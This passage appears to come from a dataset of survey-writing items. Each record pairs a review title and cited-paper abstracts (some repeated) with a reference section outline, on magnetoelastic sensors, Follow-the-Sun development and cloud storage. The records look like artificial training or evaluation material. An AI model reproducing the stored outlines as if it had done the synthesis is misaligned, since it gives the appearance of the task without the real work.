nanotubes appear to act as a scaffold, facilitating fibrin formation. Our results suggest that application of a TiO 2 nanotube functionalized bandage could be used to help stem or stop hemorrhage. ---
Title: Theory, Instrumentation and Applications of Magnetoelastic Resonance Sensors: A Review Section 1: Introduction Description 1: Provide an overview of magnetoelastic sensors, their composition, operational principle, and various applications. Section 2: The Equation of Motion of a Magnetoelastic Sensor Description 2: Explain the theoretical model, including the equation of motion for magnetoelastic sensors, and discuss the boundary conditions and resonant frequency derivation. Section 3: Effect of Mass Loading on a Magnetoelastic Sensor Description 3: Discuss how mass loading affects the resonance frequency of magnetoelastic sensors and provide experimental data demonstrating these effects. Section 4: Instrumentation: Early Developments Description 4: Describe the initial instrumentation used with magnetoelastic sensors, including the types of circuits and measurement approaches used in early research. Section 5: Modern Microcontroller Based Instrumentation Description 5: Detail advancements in instrumentation, focusing on modern microcontroller-based designs and their components. Section 6: Pressure Sensing Description 6: Explain the application of magnetoelastic sensors in pressure sensing, including theoretical background and experimental results. Section 7: Temperature Sensing Description 7: Discuss the use of magnetoelastic sensors for temperature measurement, including the effects of temperature on resonance frequency. Section 8: Measurement of Liquid Viscosity and Density Description 8: Provide insights into how magnetoelastic sensors measure liquid viscosity and density, including theoretical models and practical examples. Section 9: Monitoring Fluid Flow Rate Description 9: Describe the application of magnetoelastic sensors in monitoring fluid flow rates and the principles behind this measurement. Section 10: Measurement of Elastic Modulus of Thin Film Description 10: Discuss the use of magnetoelastic sensors to measure the elastic modulus of thin films coated on their surface. Section 11: Humidity Measurement Using a Magnetoelastic Sensor Description 11: Explain the application of magnetoelastic sensors in humidity measurement, including coating materials and experimental data. Section 12: Ethylene, CO2 and NH3 Sensors Description 12: Describe the use of magnetoelastic sensors for detecting gases like ethylene, CO2, and NH3, including the coating materials and detection principles. Section 13: Magnetoelastic pH Sensor Description 13: Discuss the application of magnetoelastic sensors in pH measurement, including the responsive materials used and experimental findings. Section 14: Detection of Escherichia coli O157:H7 Description 14: Explain the use of magnetoelastic sensors for detecting E. coli O157:H7, including methods for enhancing detection sensitivity. Section 15: Magnetoelastic Glucose Biosensor Description 15: Describe the application of magnetoelastic sensors in glucose detection, detailing the sensor design and performance in different environments. Section 16: Magnetoelastic Avidin Biosensor Description 16: Discuss the use of magnetoelastic sensors for detecting avidin, including the biochemical interactions and methods used for signal amplification. Section 17: Other Bio-Sensing Applications Description 17: Provide an overview of other bio-sensing applications of magnetoelastic sensors, including pathogens, bacterium, and biochemical agents detection. Section 18: Magnetoelastic Sensor for Monitoring Milk Quality Description 18: Explain how magnetoelastic sensors are used to monitor milk quality, including the detection of lactose and bacterial growth. Section 19: Magnetoelastic Sensor for Lipoprotein Detection Description 19: Discuss the use of magnetoelastic sensors in detecting lipoprotein particles, including the biochemical reactions involved and the challenges faced. Section 20: Magnetoelastic Sensors for Monitoring Blood Coagulation Description 20: Describe how magnetoelastic sensors are used to monitor blood coagulation, including clotting time, clot strength, and aggregation tests. Section 21: Conclusions Description 21: Summarize the versatility and potential applications of magnetoelastic sensing technology, highlighting the advancements and future directions.
A Systematic Literature Review of Best Practices and Challenges in Follow-the-Sun Software Development
6
--- paper_title: Mapping Global Software Development Practices for Follow-the-Sun Process paper_content: Several organizations are developing software processes twenty-four hours, seven days per week, with geographically distributed teams. This environment of software development enables to implement the Follow-the-Sun (FTS) strategy. In this study, we perform a mapping of the literature based upon electronic searching in digital libraries to identify applied practices in development environments twenty-four hours in which can be apply FTS strategy. Ours results present practices and many key aspects to FTS implementation. --- paper_title: Follow the Sun Workflow in Global Software Development paper_content: Follow the sun (FTS) has interesting appeal-hand off work at the end of every day from one site to the next, many time zones away, in order to speed up product development. Although the potential effect on "time to market" can be profound, at least conceptually, FTS has enjoyed few documented industry successes because it is acknowledged to be extremely difficult to implement. In order to address this "FTS challenge," we provide here a conceptual foundation and formal definition of FTS. We then analyze the conditions under which FTS can be successful in reducing duration in software development. We show that handoff efficiency is paramount to successful FTS practices and that duration can be reduced only when lower within-site coordination and improved personal productivity outweigh the corresponding increase in crosssite coordination. We also develop 12 research propositions based on fundamental issues surrounding FTS, such as calendar efficiency, development method, product architecture and handoff efficiency, within-site coordination, cross-site coordination, and personal productivity. We combine the conceptual analysis with a description of our FTS exploratory comparative field studies and draw out their key findings and learning. The main implication of this paper is that understanding calendar efficiency, handoff efficiency, within-site coordination, and cross-site coordination is necessary to evaluation-if FTS is to be successful in reducing software development duration. --- paper_title: Patterns in Effective Distributed Software Development paper_content: As with many other industries today, software development must increasingly adapt to teams whose members work together but are geographically distributed. Many factors have contributed to this rise in distributed software development (DSD), including companies' desires to leverage skilled resources wherever they can be found and to reduce costs by working in different labor markets. Its increasing popularity has led to diverse industrial experience, which has in turn led to some best practices and an initial body of knowledge. --- paper_title: Your time zone or mine?: a study of globally time zone-shifted collaboration paper_content: We conducted interviews with sixteen members of teams that worked across global time zone differences. Despite time zone differences of about eight hours, collaborators still found time to synchronously meet. The interviews identified the diverse strategies teams used to find time windows to interact, which often included times outside of the normal workday and connecting from home to participate. Recent trends in increased work connectivity from home and blurred boundaries between work and home enabled more scheduling flexibility. While email use was understandably prevalent, there was also general interest in video, although obstacles remain for widespread usage. We propose several design implications for supporting this growing population of workers that need to span global time zone differences. --- paper_title: Follow the Sun Workflow in Global Software Development paper_content: Follow the sun (FTS) has interesting appeal-hand off work at the end of every day from one site to the next, many time zones away, in order to speed up product development. Although the potential effect on "time to market" can be profound, at least conceptually, FTS has enjoyed few documented industry successes because it is acknowledged to be extremely difficult to implement. In order to address this "FTS challenge," we provide here a conceptual foundation and formal definition of FTS. We then analyze the conditions under which FTS can be successful in reducing duration in software development. We show that handoff efficiency is paramount to successful FTS practices and that duration can be reduced only when lower within-site coordination and improved personal productivity outweigh the corresponding increase in crosssite coordination. We also develop 12 research propositions based on fundamental issues surrounding FTS, such as calendar efficiency, development method, product architecture and handoff efficiency, within-site coordination, cross-site coordination, and personal productivity. We combine the conceptual analysis with a description of our FTS exploratory comparative field studies and draw out their key findings and learning. The main implication of this paper is that understanding calendar efficiency, handoff efficiency, within-site coordination, and cross-site coordination is necessary to evaluation-if FTS is to be successful in reducing software development duration. --- paper_title: FTSProc: A Process to Alleviate the Challenges of Projects that Use the Follow-the-Sun Strategy paper_content: Searching for competitive advantages as low coast and productivity gains, organizations choose to distribute their software development to other countries with more affordable production costs. Increasingly, projects are being developed in geographically distributed environments, featuring the distributed software development. However, the challenges inherent in this software development environment are significant. Among these challenges is the time zone difference, which can also be tackled as an advantage, through the use of the follow-the-sun development. However, the follow-the-sun strategy presents some challenges, mainly alongside the handoffs. Therefore, this experimental research focuses to present a development process to alleviate the challenges found in project that uses this strategy, focusing in the development phase from the SDLC. Yet, it performs an experiment to evaluate the created process' efficiency. In this experimental process it was found evidences the created process actually alleviate the challenges found in the follow-the-sun strategy. --- paper_title: Leveraging temporal and spatial separations with the 24-hour knowledge factory paradigm paper_content: The 24-H Knowledge Factory facilitates collaboration between geographically and temporally distributed teams. The teams themselves form a strategic partnership whose joint efforts contribute to the completion of a project. Project-related tasks are likewise distributed, allowing tasks to be completed on a continuous basis, regardless of the constraints of any one team's working hours. However, distributing a single task between multiple teams necessitates a handoff process, where one team's development efforts and task planning are communicated from one team ending their shift to the next that will continue the effort. Data management is, therefore, critical to the success of this business model. Efficiency in data management is achieved through a strategic leveraging of key tools, models, and concepts. --- paper_title: Patterns in Effective Distributed Software Development paper_content: As with many other industries today, software development must increasingly adapt to teams whose members work together but are geographically distributed. Many factors have contributed to this rise in distributed software development (DSD), including companies' desires to leverage skilled resources wherever they can be found and to reduce costs by working in different labor markets. Its increasing popularity has led to diverse industrial experience, which has in turn led to some best practices and an initial body of knowledge. --- paper_title: A reference model for successful Distributed Development of Software Systems paper_content: Distributed development (DD) of software systems is an issue of increasing significance for organisations today, all the more so given the current trend towards globalisation. In this paper we present a reference model which can be used as a reference point for any company wishing to review their own DD scenario. This is particularised in two forms, one as an exemplar model for a global (GSD) development scenario and one as a particularisation of this for intra-national DD scenarios. By drawing from eight case-studies on DD, we present ten general strategies for successful DD together with our reference model which characterises an ideal DD situation. --- paper_title: Mapping Global Software Development Practices for Follow-the-Sun Process paper_content: Several organizations are developing software processes twenty-four hours, seven days per week, with geographically distributed teams. This environment of software development enables to implement the Follow-the-Sun (FTS) strategy. In this study, we perform a mapping of the literature based upon electronic searching in digital libraries to identify applied practices in development environments twenty-four hours in which can be apply FTS strategy. Ours results present practices and many key aspects to FTS implementation. --- paper_title: Modelling software development across time zones paper_content: Economic factors and the World Wide Web are turning software usage and its development into global activities. Many benefits accrue from global development not least from the opportunity to reduce time-to-market through 'around the clock' working. This paper identified some of the factors and constraints that influence time-to-market when software is developed across time zones. It describes a model of the relationships between development time and the factors and overheads associated with such a pattern of work. The paper also reports on a small-scale empirical study of software development across time zones and presents some lessons learned and conclusions drawn from the theoretical and empirical work carried out. --- paper_title: Culture in Global Software Development - A Weakness or Strength? paper_content: Cultural diversity is assumed to be a fundamental issue in global software development. Research carried out to date has raised concerns over how to manage cultural differences in global software development. Our empirical research in India, a major outsourcing destination, has helped us investigate this complex issue of global software development. A triangulated study based on a questionnaire, telephonic interviews and structured face-to-face interviews with 15 Project Managers and Senior Executives has revealed how they cope with the demands of cultural differences imposed by a geographically distributed environment. This research study brings forward various techniques initiated by these project managers to deal with cultural differences that exist within geographically distributed software development teams. We also discuss different strategies and make a case to explain how to build on and take advantage of cultural differences that exist in global software development. --- paper_title: Selecting Locations for Follow-the-Sun Software Development: Towards a Routing Model paper_content: Deciding where to establish development locations is a strategic decision in the field of Follow-the-Sun software development. Our research has focussed on two factors: a. the optimal time zone difference between locations, and b. the natural ease of communication. The former depends on the required transfer time for handing over work from one location to the other. The latter involves communication aspects such as language. The objective is to construct a routing model, which calculates (sub)optimal deployment routes. The routing model consists of an algorithm that calculates sequences of locations from a dataset containing demographic data about these locations. The possible sequences are prioritized based on a set of parameters. The routing model has been implemented in a website. The website can be used to validate the routing model, but moreover can be used as a first support when considering potential locations for Follow-the-Sun software development. --- paper_title: Use of collaborative technologies and knowledge sharing in co-located and distributed teams: Towards the 24-h knowledge factory paper_content: The relocation of knowledge work to emerging countries is leading to an increasing use of globally distributed teams (GDT) engaged in complex tasks. In the present study, we investigate a particular type of GDT working 'around the clock': the 24-h knowledge factory (Gupta, 2008). Adopting the productivity perspective on knowledge sharing (Haas and Hansen, 2005, 2007), we hypothesize how a 24-h knowledge factory and a co-located team will differ in technology use, knowledge sharing processes, and performance. We conducted a quasi-experiment in IBM, collecting both quantitative and qualitative data, over a period of 12months, on a GDT and a co-located team. Both teams were composed of the same number of professionals, provided with the same technologies, engaged in similar tasks, and given similar deadlines. We found significant differences in their use of technologies and in knowledge sharing processes, but not in efficiency and quality of outcomes. We show how the co-located team and the GDT enacted a knowledge codification strategy and a personalization strategy, respectively; in each case grafting elements of the other strategy in order to attain both knowledge re-use and creativity. We conclude by discussing theoretical contributions to knowledge sharing and GDT literatures, and by highlighting managerial implications to those organizations interested in developing a fully functional 24-h knowledge factory. --- paper_title: The object-oriented team: Lessons for virtual teams from global software development paper_content: We investigated coordination and communication processes in global virtual software development teams in three Indian multinational technology firms. While some of the teams in our study experienced many of the same things observed in prior research, some operated in strikingly different ways, so different, in fact, that they led us to propose a new type of organization for global virtual teams: the object-oriented team. In contrast to the traditional virtual team approach which strives to tightly couple team members through information rich media such as face-to-face and telephone communication, the object-oriented team strives to decouple team members through the use of well defined processes and semantically rich media that clarify, extend and constrain meaning. The set of principles embodied ire the object-oriented team we believe may be applicable to many types of virtual teams, especially larger teams facing complex problems. --- paper_title: Your time zone or mine?: a study of globally time zone-shifted collaboration paper_content: We conducted interviews with sixteen members of teams that worked across global time zone differences. Despite time zone differences of about eight hours, collaborators still found time to synchronously meet. The interviews identified the diverse strategies teams used to find time windows to interact, which often included times outside of the normal workday and connecting from home to participate. Recent trends in increased work connectivity from home and blurred boundaries between work and home enabled more scheduling flexibility. While email use was understandably prevalent, there was also general interest in video, although obstacles remain for widespread usage. We propose several design implications for supporting this growing population of workers that need to span global time zone differences. --- paper_title: Agile Software Processes for the 24-Hour Knowledge Factory Environment paper_content: The growing adoption of outsourcing and offshoring concepts is presenting new opportunities for distributed software development. Inspired by the paradigm of round-the-clock manufacturing, the concept of the 24-hour knowledge factory (24HrKF) attempts to make similar transformations in the arena of IS: specifically to transform the production of software and allied intangibles to benefit from the notion of continuous development by establishing multiple collaborating sites at strategically selected locations around the globe. As the sun sets on one site, it rises on another site with the day’s work being handed off from the closing site to the opening site. In order to enable such hand offs to occur in an effective manner, new agile and distributed software processes are needed, as delineated in this article. --- paper_title: Follow the Sun Workflow in Global Software Development paper_content: Follow the sun (FTS) has interesting appeal-hand off work at the end of every day from one site to the next, many time zones away, in order to speed up product development. Although the potential effect on "time to market" can be profound, at least conceptually, FTS has enjoyed few documented industry successes because it is acknowledged to be extremely difficult to implement. In order to address this "FTS challenge," we provide here a conceptual foundation and formal definition of FTS. We then analyze the conditions under which FTS can be successful in reducing duration in software development. We show that handoff efficiency is paramount to successful FTS practices and that duration can be reduced only when lower within-site coordination and improved personal productivity outweigh the corresponding increase in crosssite coordination. We also develop 12 research propositions based on fundamental issues surrounding FTS, such as calendar efficiency, development method, product architecture and handoff efficiency, within-site coordination, cross-site coordination, and personal productivity. We combine the conceptual analysis with a description of our FTS exploratory comparative field studies and draw out their key findings and learning. The main implication of this paper is that understanding calendar efficiency, handoff efficiency, within-site coordination, and cross-site coordination is necessary to evaluation-if FTS is to be successful in reducing software development duration. --- paper_title: FTSProc: A Process to Alleviate the Challenges of Projects that Use the Follow-the-Sun Strategy paper_content: Searching for competitive advantages as low coast and productivity gains, organizations choose to distribute their software development to other countries with more affordable production costs. Increasingly, projects are being developed in geographically distributed environments, featuring the distributed software development. However, the challenges inherent in this software development environment are significant. Among these challenges is the time zone difference, which can also be tackled as an advantage, through the use of the follow-the-sun development. However, the follow-the-sun strategy presents some challenges, mainly alongside the handoffs. Therefore, this experimental research focuses to present a development process to alleviate the challenges found in project that uses this strategy, focusing in the development phase from the SDLC. Yet, it performs an experiment to evaluate the created process' efficiency. In this experimental process it was found evidences the created process actually alleviate the challenges found in the follow-the-sun strategy. --- paper_title: Management at the Outsourcing Destination - Global Software Development in India paper_content: In Global Software Engineering Research, there have been many studies carried out from the perspective of the company who is outsourcing software development. However, very few studies focus on the companies to whom the software development is being outsourced. In this paper, we highlight India as a major outsourcing destination and present experience from companies that manage outsourced software development. In carrying out this activity, Indian software companies have confronted various issues which are local, remote, internal and external and for which solutions have been instigated. This paper presents research carried out within Indian software companies in which we investigated issues faced when implementing global software development and the solutions used by these companies. We present these solutions so that they can be followed by other outsourcing destinations thus enabling them to operate successfully across geographical, national and international cultural boundaries. --- paper_title: Global Software Development Challenges: A Case Study on Temporal, Geographical and Socio-Cultural Distance paper_content: Global software development (GSD) is a phenomenon that is receiving considerable interest from companies all over the world. In GSD, stakeholders from different national and organizational cultures are involved in developing software and the many benefits include access to a large labour pool, cost advantage and round-the-clock development. However, GSD is technologically and organizationally complex and presents a variety of challenges to be managed by the software development team. In particular, temporal, geographical and socio-cultural distances impose problems not experienced in traditional systems development. In this paper, we present findings from a case study in which we explore the particular challenges associated with managing GSD. Our study also reveals some of the solutions that are used to deal with these challenges. We do so by empirical investigation at three US based GSD companies operating in Ireland. Based on qualitative interviews we present challenges related to temporal, geographical and socio-cultural distance. --- paper_title: Follow the Sun Workflow in Global Software Development paper_content: Follow the sun (FTS) has interesting appeal-hand off work at the end of every day from one site to the next, many time zones away, in order to speed up product development. Although the potential effect on "time to market" can be profound, at least conceptually, FTS has enjoyed few documented industry successes because it is acknowledged to be extremely difficult to implement. In order to address this "FTS challenge," we provide here a conceptual foundation and formal definition of FTS. We then analyze the conditions under which FTS can be successful in reducing duration in software development. We show that handoff efficiency is paramount to successful FTS practices and that duration can be reduced only when lower within-site coordination and improved personal productivity outweigh the corresponding increase in crosssite coordination. We also develop 12 research propositions based on fundamental issues surrounding FTS, such as calendar efficiency, development method, product architecture and handoff efficiency, within-site coordination, cross-site coordination, and personal productivity. We combine the conceptual analysis with a description of our FTS exploratory comparative field studies and draw out their key findings and learning. The main implication of this paper is that understanding calendar efficiency, handoff efficiency, within-site coordination, and cross-site coordination is necessary to evaluation-if FTS is to be successful in reducing software development duration. --- paper_title: FTSProc: A Process to Alleviate the Challenges of Projects that Use the Follow-the-Sun Strategy paper_content: Searching for competitive advantages as low coast and productivity gains, organizations choose to distribute their software development to other countries with more affordable production costs. Increasingly, projects are being developed in geographically distributed environments, featuring the distributed software development. However, the challenges inherent in this software development environment are significant. Among these challenges is the time zone difference, which can also be tackled as an advantage, through the use of the follow-the-sun development. However, the follow-the-sun strategy presents some challenges, mainly alongside the handoffs. Therefore, this experimental research focuses to present a development process to alleviate the challenges found in project that uses this strategy, focusing in the development phase from the SDLC. Yet, it performs an experiment to evaluate the created process' efficiency. In this experimental process it was found evidences the created process actually alleviate the challenges found in the follow-the-sun strategy. --- paper_title: Leveraging temporal and spatial separations with the 24-hour knowledge factory paradigm paper_content: The 24-H Knowledge Factory facilitates collaboration between geographically and temporally distributed teams. The teams themselves form a strategic partnership whose joint efforts contribute to the completion of a project. Project-related tasks are likewise distributed, allowing tasks to be completed on a continuous basis, regardless of the constraints of any one team's working hours. However, distributing a single task between multiple teams necessitates a handoff process, where one team's development efforts and task planning are communicated from one team ending their shift to the next that will continue the effort. Data management is, therefore, critical to the success of this business model. Efficiency in data management is achieved through a strategic leveraging of key tools, models, and concepts. --- paper_title: Management at the Outsourcing Destination - Global Software Development in India paper_content: In Global Software Engineering Research, there have been many studies carried out from the perspective of the company who is outsourcing software development. However, very few studies focus on the companies to whom the software development is being outsourced. In this paper, we highlight India as a major outsourcing destination and present experience from companies that manage outsourced software development. In carrying out this activity, Indian software companies have confronted various issues which are local, remote, internal and external and for which solutions have been instigated. This paper presents research carried out within Indian software companies in which we investigated issues faced when implementing global software development and the solutions used by these companies. We present these solutions so that they can be followed by other outsourcing destinations thus enabling them to operate successfully across geographical, national and international cultural boundaries. ---
Title: A Systematic Literature Review of Best Practices and Challenges in Follow-the-Sun Software Development Section 1: Introduction Description 1: Introduce the concept of Follow-the-Sun (FTS) in Global Software Development (GSD), state the aim of the study, and provide an overview of the paper structure. Section 2: Follow-the-Sun Software Development Description 2: Define and describe the concept of Follow-the-Sun in the context of software development, its purpose, and key operational elements such as handoff. Section 3: Research Method Description 3: Explain the systematic literature review (SLR) methodology used, including the research protocol, data sources, search strings, selection process, data extraction, and validity threats. Section 4: Results Description 4: Present the findings of the study based on the research questions, detailing the identified challenges and best practices in FTS. Section 5: Discussion Description 5: Analyze the results, discuss the frequencies and significance of identified challenges and best practices, and highlight insights and implications for future research and practice. Section 6: Conclusions and Future Work Description 6: Summarize the key conclusions of the study, discuss its contributions to the field, and propose directions for future research.
A Survey on Cloud Storage
5
--- paper_title: Compute and Storage Clouds Using Wide Area High Performance Networks paper_content: We describe a cloud-based infrastructure that we have developed that is optimized for wide area, high performance networks and designed to support data mining applications. The infrastructure consists of a storage cloud called Sector and a compute cloud called Sphere. We describe two applications that we have built using the cloud and some experimental studies. --- paper_title: The Google file system paper_content: We have designed and implemented the Google File System, a scalable distributed file system for large distributed data-intensive applications. It provides fault tolerance while running on inexpensive commodity hardware, and it delivers high aggregate performance to a large number of clients. While sharing many of the same goals as previous distributed file systems, our design has been driven by observations of our application workloads and technological environment, both current and anticipated, that reflect a marked departure from some earlier file system assumptions. This has led us to reexamine traditional choices and explore radically different design points. The file system has successfully met our storage needs. It is widely deployed within Google as the storage platform for the generation and processing of data used by our service as well as research and development efforts that require large data sets. The largest cluster to date provides hundreds of terabytes of storage across thousands of disks on over a thousand machines, and it is concurrently accessed by hundreds of clients. In this paper, we present file system interface extensions designed to support distributed applications, discuss many aspects of our design, and report measurements from both micro-benchmarks and real world use. --- paper_title: Market-Oriented Cloud Computing: Vision, Hype, and Reality for Delivering IT Services as Computing Utilities paper_content: This keynote paper: presents a 21 st century vision of computing; identifies various computing paradigms promising to deliver the vision of computing utilities; defines Cloud computing and provides the architecture for creating market-oriented Clouds by leveraging technologies such as VMs; provides thoughts on marketbased resource management strategies that encompass both customer-driven service management and computational risk management to sustain SLA-oriented resource allocation; presents some representative Cloud platforms especially those developed in industries along with our current work towards realising market-oriented resource allocation of Clouds by leveraging the 3 rd generation Aneka enterprise Grid technology; reveals our early thoughts on interconnecting Clouds for dynamically creating an atmospheric computing environment along with pointers to future community research; and concludes with the need for convergence of competing IT paradigms for delivering our 21 st century vision. --- paper_title: MapReduce: simplified data processing on large clusters paper_content: MapReduce is a programming model and an associated implementation for processing and generating large datasets that is amenable to a broad variety of real-world tasks. Users specify the computation in terms of a map and a reduce function, and the underlying runtime system automatically parallelizes the computation across large-scale clusters of machines, handles machine failures, and schedules inter-machine communication to make efficient use of the network and disks. Programmers find the system easy to use: more than ten thousand distinct MapReduce programs have been implemented internally at Google over the past four years, and an average of one hundred thousand MapReduce jobs are executed on Google's clusters every day, processing a total of more than twenty petabytes of data per day. --- paper_title: Bigtable: A Distributed Storage System for Structured Data paper_content: Bigtable is a distributed storage system for managing structured data that is designed to scale to a very large size: petabytes of data across thousands of commodity servers. Many projects at Google store data in Bigtable, including web indexing, Google Earth, and Google Finance. These applications place very different demands on Bigtable, both in terms of data size (from URLs to web pages to satellite imagery) and latency requirements (from backend bulk processing to real-time data serving). Despite these varied demands, Bigtable has successfully provided a flexible, high-performance solution for all of these Google products. In this paper we describe the simple data model provided by Bigtable, which gives clients dynamic control over data layout and format, and we describe the design and implementation of Bigtable. --- paper_title: The Google file system paper_content: We have designed and implemented the Google File System, a scalable distributed file system for large distributed data-intensive applications. It provides fault tolerance while running on inexpensive commodity hardware, and it delivers high aggregate performance to a large number of clients. While sharing many of the same goals as previous distributed file systems, our design has been driven by observations of our application workloads and technological environment, both current and anticipated, that reflect a marked departure from some earlier file system assumptions. This has led us to reexamine traditional choices and explore radically different design points. The file system has successfully met our storage needs. It is widely deployed within Google as the storage platform for the generation and processing of data used by our service as well as research and development efforts that require large data sets. The largest cluster to date provides hundreds of terabytes of storage across thousands of disks on over a thousand machines, and it is concurrently accessed by hundreds of clients. In this paper, we present file system interface extensions designed to support distributed applications, discuss many aspects of our design, and report measurements from both micro-benchmarks and real world use. --- paper_title: Compute and Storage Clouds Using Wide Area High Performance Networks paper_content: We describe a cloud-based infrastructure that we have developed that is optimized for wide area, high performance networks and designed to support data mining applications. The infrastructure consists of a storage cloud called Sector and a compute cloud called Sphere. We describe two applications that we have built using the cloud and some experimental studies. --- paper_title: Data Mining Using High Performance Data Clouds: Experimental Studies Using Sector and Sphere paper_content: We describe the design and implementation of a high performance cloud that we have used to archive, analyze and mine large distributed data sets. By a cloud, we mean an infrastructure that provides resources and/or services over the Internet. A storage cloud provides storage services, while a compute cloud provides compute services. We describe the design of the Sector storage cloud and how it provides the storage services required by the Sphere compute cloud. We also describe the programming paradigm supported by the Sphere compute cloud. Sector and Sphere are designed for analyzing large data sets using computer clusters connected with wide area high performance networks (for example, 10+ Gb/s). We describe a distributed data mining application that we have developed using Sector and Sphere. Finally, we describe some experimental studies comparing Sector/Sphere to Hadoop. --- paper_title: Provably secure authentication protocol based on convertible proxy signcryption in cloud computing paper_content: Mutual authentication between the user and the public cloud is essential requirement for the user to access the public cloud in cloud computing. In 2011, Juang et al. proposed a first authentication scheme based on proxy signature. The advantage of the scheme is that the user only needs to register on his home service cloud (HSC), and can pass through the authentication of the public cloud with the help of his HSC. However, their scheme has three weaknesses: 1) the user's HSC needs to update the user's public key in each session to protect the user's privacy; 2) HSC may suffer from network jam when many users in the same HSC need to register on different public clouds simultaneously; and 3) a secret key should be shared between HSC and visiting cloud. To overcome these weaknesses, a provably secure convertible proxy signcryption for privacy preserving is proposed. Based on this scheme, a novel one-round authentication protocol is proposed, which the user only needs to register on his HSC, and can pass through the authentication of the visiting cloud without the help of his HSC. On the other hand, the proposed protocol can provide some nice properties, such as user privacy protection, non-repudiation, without updating the user's public key, and secret key does not have to be shared between HSC and visiting cloud. In addition, the proposed scheme is provably secure in the random oracle model, and is more efficient than Juang et al.'s scheme. --- paper_title: ZettaDS: A Light-weight Distributed Storage System for Cluster paper_content: We have designed and implemented the Zetta data storage system (ZettaDS), a light-weight scalable distributed data storage system for cluster. While sharing many common characters with some of modern distributed data storage systems such as single meta server architecture, running on inexpensive commodity components, our system is a very light-weight one and aims to handle lots of small files efficiently. The emphases of our design are on scalability of storage capacity and manageability. Throughput and performance are considered secondary. Furthermore, ZettaDS is designed to minimize the resource consumption due to running on a non-dedicated system.The paper describes the details and rationales of the design and implementation. Also, we evaluate our system by some experiments. The results demonstrate that our system can use the storage spaces more efficiently and achieve better transfer performance when facing a large number of small files. --- paper_title: Sector and Sphere: the design and implementation of a high-performance data cloud paper_content: Cloud computing has demonstrated that processing very large datasets over commodity clusters can be done simply, given the right programming model and infrastructure. In this paper, we describe the design and implementation of the Sector storage cloud and the Sphere compute cloud. By contrast with the existing storage and compute clouds, Sector can manage data not only within a data centre, but also across geographically distributed data centres. Similarly, the Sphere compute cloud supports user-defined functions (UDFs) over data both within and across data centres. As a special case, MapReduce-style programming can be implemented in Sphere by using a Map UDF followed by a Reduce UDF. We describe some experimental studies comparing Sector/Sphere and Hadoop using the Terasort benchmark. In these studies, Sector is approximately twice as fast as Hadoop. Sector/Sphere is open source. --- paper_title: Rethinking deduplication in cloud: From data profiling to blueprint paper_content: Cloud storage system is becoming the substantial component of the cloud system due to emerging trend of user data. Different from other computing resources, storage resource is vulnerable to the cost issue since the data should be maintained during the downtime. In this paper, we investigate the benefit and overhead when deduplication techniques are adopted to the cloud storage system. From the result, we discuss several challenges across the cloud storage. Furthermore, we suggest the cloud storage architecture and the deduplication engine to optimize the deduplication feature in the cloud storage system. We expect that our suggestions reduce the cloud storage system cost efficiently without performance degradation of data transfer. --- paper_title: Cloud context-based onboard data compression paper_content: A simplified cloud mask algorithm suitable for present-day onboard processing is developed based on the operational MODIS cloud mask algorithm. The code is reduced to less than 45% of its original size while retaining 90% of the accuracy. Clear sky data compression is tested using our simplified cloud mask followed by application of the CCSDS lossless compression algorithm. For most of the channels, compressing the cloud masked MODIS L1B data can reduce the data volume by about 40% compared with compression without using cloud mask. The cloud mask was also applied to L1A data with comparable or even better data reduction performance depending on local data filling schemes. The cloud mask itself can be compressed to less than 0.5 bit-per-pixel. This paper summarizes our approach and provides results in detail. --- paper_title: Evaluating Cloud Platform Architecture with the CARE Framework paper_content: There is an emergence of Cloud application platforms such as Microsoft’s Azure, Google’s App Engine and Amazon’s EC2/SimpleDB/S3. Startups and Enterprise alike, lured by the promise of ‘infinite scalability’, ‘ease of development’, ‘low infrastructure setup cost’ are increasingly using these Cloud service building blocks to develop and deploy their web based applications. However, the precise nature of these Cloud platforms and the resultant Cloud application runtime behavior is still largely an unknown. Given the black box nature of these platforms, and the novel programming and data models of Cloud, there is a dearth of tools and techniques for enabling the rigorously evaluation of Cloud platforms at runtime. This paper introduces the CARE (Cloud Architecture Runtime Evaluation) approach, a framework for evaluating Cloud application development and runtime platforms. CARE implements a unified interface with WSDL and REST in order to evaluate different Cloud platforms for Cloud application hosting servers and Cloud databases. With the unified interface, we are able to perform selective high stress and low stress evaluations corresponding to desired test scenarios. Result shows the effectiveness of CARE in the evaluation of Cloud variations in terms of scalability, availability and responsiveness, across both compute and storage capabilities. Thus placing CARE as an important tool in the path of Cloud computing research. --- paper_title: A Secure Cloud Backup System with Assured Deletion and Version Control paper_content: Cloud storage is an emerging service model that enables individuals and enterprises to outsource the storage of data backups to remote cloud providers at a low cost. However, cloud clients must enforce security guarantees of their outsourced data backups. We present Fade Version, a secure cloud backup system that serves as a security layer on top of today's cloud storage services. Fade Version follows the standard version-controlled backup design, which eliminates the storage of redundant data across different versions of backups. On top of this, Fade Version applies cryptographic protection to data backups. Specifically, it enables fine-grained assured deletion, that is, cloud clients can assuredly delete particular backup versions or files on the cloud and make them permanently inaccessible to anyone, while other versions that share the common data of the deleted versions or files will remain unaffected. We implement a proof-of-concept prototype of Fade Version and conduct empirical evaluation atop Amazon S3. We show that Fade Version only adds minimal performance overhead over a traditional cloud backup service that does not support assured deletion. --- paper_title: General survey on massive data encryption paper_content: With the rapid development of Cloud computing, Internet of Things and social network technologies, the network data are increasing dramatically. The security of massive data interaction has attracted more and more attention in recently years. This paper discusses the encryption principles, advantages and disadvantages of some mainstream massive data encryption technologies, i.e., the encryption technology based on modern cryptosystem, the encryption technology based on parallel and distributed computing, the encryption technology based on biological engineering, and Attribute-based massive data encryption technology. Finally, we outlook the need-to-be solved problems and development trend of the massive data encryption technology. ---
Title: A Survey on Cloud Storage Section 1: INTRODUCTION Description 1: This section introduces the concept of cloud storage, its significance in IT projects, and the distinctions between public, private, and hybrid cloud storage. Section 2: INTRODUCTION FORMATION OF CLOUD COMPUTING Description 2: This section traces the evolution of cloud computing concepts, the emergence of cloud storage as part of this evolution, and the role of major technology companies in advancing cloud storage technologies. Section 3: CORE TECHNOLOGY OF CLOUD STORAGE Description 3: This section discusses the fundamental technologies underpinning cloud storage, including Google File System (GFS), Hadoop Distributed File System (HDFS), and other high-performance storage technologies. Section 4: CLOUD STORAGE RESEARCHS Description 4: This section reviews current research and developments in cloud storage, examining high-performance distributed file systems, private storage clouds, and various academic contributions to the field. Section 5: CONCLUSIONS AND FUTURE WORK Description 5: This section summarizes the advantages of cloud storage over traditional storage solutions and outlines potential future research directions in cloud storage technology.
A survey on algorithmic debugging strategies
6
